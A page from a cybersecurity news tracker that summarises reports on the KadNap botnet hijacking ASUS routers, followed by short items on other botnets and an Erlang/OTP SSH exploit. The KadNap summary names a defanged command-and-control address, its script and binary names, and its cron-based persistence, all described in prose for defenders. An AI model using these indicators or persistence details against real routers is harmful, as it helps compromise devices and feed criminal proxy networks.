CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

KadNap Botnet Hijacks ASUS Routers for Cybercrime Proxy Network

First reported
Last updated
2 unique sources, 2 articles

Summary

Hide ▲

A new botnet named KadNap targets ASUS routers and other edge networking devices, turning them into proxies for malicious traffic. Since August 2025, it has grown to 14,000 devices, using a peer-to-peer network and a custom Kademlia Distributed Hash Table (DHT) protocol to evade detection. The botnet is linked to the Doppelganger proxy service, which sells access to infected devices for cybercrime activities. Most infected devices are located in the United States (60%), followed by Taiwan, Hong Kong, and Russia. The infection begins with a malicious script that downloads an ELF binary, establishing persistence via a cron job. The botnet uses NTP servers for time synchronization and a modified Kademlia protocol for communication, making it difficult to identify and disrupt the command-and-control (C2) infrastructure. Lumen Technologies has taken proactive measures to block network traffic to and from the control infrastructure, but the disruption is limited to their network. Indicators of compromise will be released to help others disrupt the botnet. KadNap malware uses a shell script (aic.sh) downloaded from the C2 server (212.104.141[.]140) to initiate the process of conscripting the victim to the P2P network. The malware creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to .asusrouter, and run it. Once persistence is established, the script pulls a malicious ELF file, renames it to kad, and executes it. The files fwr.sh and /tmp/.sose contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and extract a list of C2 IP address:port combinations to connect to.

Timeline

  1. 10.03.2026 17:01 2 articles · 20h ago

    KadNap Botnet Hijacks ASUS Routers for Cybercrime Proxy Network

    Since August 2025, the KadNap botnet has grown to 14,000 devices, using a peer-to-peer network and a custom Kademlia DHT protocol to evade detection. The botnet is linked to the Doppelganger proxy service, which sells access to infected devices for cybercrime activities. Lumen Technologies has taken proactive measures to block network traffic to and from the control infrastructure, but the disruption is limited to their network. Indicators of compromise will be released to help others disrupt the botnet. The infection begins with a malicious script (aic.sh) downloaded from the C2 server (212.104.141[.]140) to initiate the process of conscripting the victim to the P2P network. The malware creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to .asusrouter, and run it. Once persistence is established, the script pulls a malicious ELF file, renames it to kad, and executes it. The files fwr.sh and /tmp/.sose contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and extract a list of C2 IP address:port combinations to connect to.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

SSHStalker Linux Botnet Uses IRC for C2 Communications

A new Linux botnet named SSHStalker has been documented, utilizing the outdated IRC protocol for command-and-control (C2) operations. The botnet employs classic IRC mechanics, including multiple C-based bots and multi-server/channel redundancy, prioritizing resilience and scale over stealth. It achieves initial access through automated SSH scanning and brute-forcing, using a Go binary disguised as nmap. Once infected, hosts are used to scan for additional SSH targets, and the botnet includes exploits for 16 CVEs targeting older Linux kernel versions. The botnet also performs AWS key harvesting, website scanning, and includes cryptomining kits and DDoS capabilities. Notably, SSHStalker maintains persistent access without immediate follow-on post-exploitation behavior, suggesting it may be used for staging, testing, or strategic access retention. The threat actor is suspected to be of Romanian origin, with operational overlaps with the hacking group Outlaw (aka Dota).

Open in new tab

ShadowV2 Botnet Targets Misconfigured AWS Docker Containers and IoT Devices for DDoS Attacks

The ShadowV2 botnet targets misconfigured Docker containers on Amazon Web Services (AWS) to deploy a Go-based malware, turning infected systems into nodes for a distributed denial-of-service (DDoS) botnet. This botnet is available for rent to conduct DDoS attacks, employing advanced techniques such as HTTP/2 Rapid Reset and bypassing Cloudflare's Under Attack mode. The botnet was detected on June 24, 2025, and is believed to be part of a DDoS-for-Hire service. The botnet uses a Python-based C2 framework hosted on GitHub Codespaces and a Go-based remote access trojan (RAT) for command execution and communication. The malware first spawns a generic setup container from an Ubuntu image, installs necessary tools, and then builds and deploys a live container. This approach may help avoid leaving forensic artifacts on the victim machine. The malware communicates with a C2 server to receive commands and conduct attacks. The botnet's dynamic container deployment allows highly configurable attacks while concealing activity behind cloud-native architecture. The botnet targets 24,000 IP addresses with port 2375 open, though not all are exploitable. The malware sends a heartbeat signal to the C2 server every second and polls for new attack commands every five seconds. The botnet is actively used, with observed commands to launch attacks against at least one website. Additionally, the ShadowV2 botnet has been observed targeting IoT devices from D-Link, TP-Link, and other vendors with exploits for known vulnerabilities. The botnet was active during the major AWS outage in October, possibly as a test run. The malware identifies itself as 'ShadowV2 Build v1.0.0 IoT version' and is similar to the Mirai LZRD variant. The botnet supports DDoS attacks on UDP, TCP, and HTTP protocols, with various flood types for each.

Open in new tab

Aisuru botnet conducts record-breaking DDoS attacks, targeting U.S. ISPs and Microsoft Azure

The **Aisuru/Kimwolf botnet ecosystem** continues to evolve, now **disrupting critical anonymity infrastructure** alongside its record-breaking DDoS campaigns. In **February 2026**, Kimwolf operators **accidentally crippled the I2P anonymity network** by attempting to onboard **700,000 infected devices** as nodes, overwhelming the network’s typical **15,000–20,000-device capacity** and triggering a **Sybil attack** that halved I2P’s functionality. This follows the botnet’s **31.4 Tbps DDoS attack** (November 2025) and **holiday-themed "The Night Before Christmas" campaign** (December 19, 2025), which peaked at **24 Tbps, 9 Bpps, and 205 Mrps**—part of a **100% YoY increase in DDoS volume** (47.1 million attacks mitigated in 2025). With **over 6 million infected devices** (1–4M IoT for Aisuru; **>2M Android TVs/boxes** for Kimwolf), the botnets blend **hyper-volumetric DDoS** with **residential proxy monetization**, targeting sectors beyond gaming to include **telecom, IT, finance, AI, and now anonymity networks**. The **January 2026 takedown of IPIDEA**—a key proxy enabler—reduced millions of exit nodes, but **persistent infections** and **new evasion tactics** (e.g., **I2P/Tor C2 experimentation, ENS-based domains**) highlight the botnets’ **adaptive resilience**. Despite **internal operator conflicts** reducing Kimwolf’s scale by **600,000+ devices**, the ecosystem remains a **systemic risk to global internet stability, enterprise security, and privacy infrastructure**.

Open in new tab

RapperBot Botnet Administrator Charged in the U.S.

The RapperBot botnet, operated by Ethan Foltz, has been responsible for over 370,000 DDoS attacks targeting victims in over 80 countries since 2021. The botnet, also known as Eleven Eleven Botnet and CowBot, primarily infects DVRs and Wi-Fi routers to launch DDoS attacks and mine Monero. Foltz, 22, from Eugene, Oregon, was charged with aiding and abetting computer intrusions related to the botnet. The botnet's command-and-control infrastructure was seized during a search of Foltz's residence on August 6, 2025. The botnet has targeted U.S. government systems, major media platforms, gaming companies, and large tech firms. It added a cryptomining module in 2023 to diversify its revenue stream. The attacks ranged from several terabits to over 1 billion packets per second (pps), with the largest attack exceeding 6 Tbps. The disruption of RapperBot is part of Operation PowerOFF, an international effort to dismantle DDoS-for-hire infrastructures. The botnet has not shown any signs of resurgence in malicious activity following the seizure of its infrastructure.

Open in new tab

Erlang/OTP SSH RCE Exploits Targeting OT Firewalls

A surge in exploitation of CVE-2025-32433, a critical security flaw in Erlang/OTP SSH, has been observed since May 2025. Approximately 70% of these exploits target operational technology (OT) firewalls. This vulnerability, patched in April 2025, allows attackers to execute arbitrary code on vulnerable systems without authentication. The attacks have primarily affected healthcare, agriculture, media, entertainment, and high technology sectors in the U.S., Canada, Brazil, India, Australia, Japan, the Netherlands, Ireland, and France. The exploitation involves using reverse shells to gain unauthorized remote access to target networks. The specific threat actors behind these efforts remain unidentified. The flaw is due to improper state enforcement in the Erlang/OTP SSH daemon, allowing unauthenticated clients to execute commands by sending SSH connection protocol messages to open SSH ports. The flaw has been exploited to create TCP connections and bind them to a shell, allowing interactive command execution over the network. The flaw could have severe consequences on an organization, their network, and operations, including the compromise of sensitive information and disruption of operations.

Open in new tab